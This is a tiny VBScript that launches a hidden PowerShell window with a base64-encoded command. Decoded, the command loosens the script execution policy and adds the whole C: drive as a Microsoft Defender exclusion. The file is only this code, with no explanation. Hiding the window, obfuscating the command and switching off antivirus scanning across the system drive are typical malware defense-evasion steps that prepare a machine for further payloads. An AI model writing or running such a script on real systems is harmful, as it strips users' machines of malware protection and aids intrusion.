Set objShell = CreateObject("Wscript.Shell")
objShell.Run("powershell -sta -NoExit -WindowStyle Hidden -EncodedCommand ""UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFIAZQBtAG8AdABlAFMAaQBnAG4AZQBkAA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAAiAA==""")
